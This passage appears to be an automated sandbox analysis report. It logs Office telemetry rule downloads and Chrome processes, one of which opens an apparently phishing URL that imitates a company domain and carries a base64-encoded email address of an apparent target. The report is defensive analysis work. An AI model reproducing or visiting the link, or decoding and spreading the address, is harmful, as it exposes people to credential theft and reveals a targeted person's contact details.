                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          81192.168.2.44985613.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:39 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 477
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                          ETag: "0x8DC582BA54DCC28"
                                                                                                                          x-ms-request-id: c388be8e-101e-008e-2ebf-3ecf88000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154340Z-178bfbc474bq2pr7hC1NYCkfgg00000007ug00000000b243
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:40 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          82192.168.2.44986213.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:40 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:41 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:41 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                          ETag: "0x8DC582BB7F164C3"
                                                                                                                          x-ms-request-id: ba3424f4-801e-0047-3bbf-3e7265000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154341Z-178bfbc474bpnd5vhC1NYC4vr400000007n000000000gmn6
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:41 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          83192.168.2.44986313.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:41 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:41 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:41 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 477
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                          ETag: "0x8DC582BA48B5BDD"
                                                                                                                          x-ms-request-id: 891407d0-301e-0096-28a6-3ee71d000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154341Z-178bfbc474bw8bwphC1NYC38b400000007m0000000002adu
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:41 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          84192.168.2.44986613.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:41 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-11-25 15:43:42 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:43:42 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                          ETag: "0x8DC582B9FF95F80"
                                                                                                                          x-ms-request-id: 2315140c-801e-0015-4daf-3ef97f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241125T154342Z-178bfbc474bwh9gmhC1NYCy3rs00000007r000000000fmw1
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-11-25 15:43:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          85192.168.2.44986713.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:42 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          86192.168.2.44986813.107.246.63443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:43:42 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net


                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:10:42:13
                                                                                                                          Start date:25/11/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:2
                                                                                                                          Start time:10:42:16
                                                                                                                          Start date:25/11/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2272,i,518914970314299408,18083616340213394987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          Target ID:3
                                                                                                                          Start time:10:42:18
                                                                                                                          Start date:25/11/2024
                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20="
                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                          File size:3'242'272 bytes
                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          No disassembly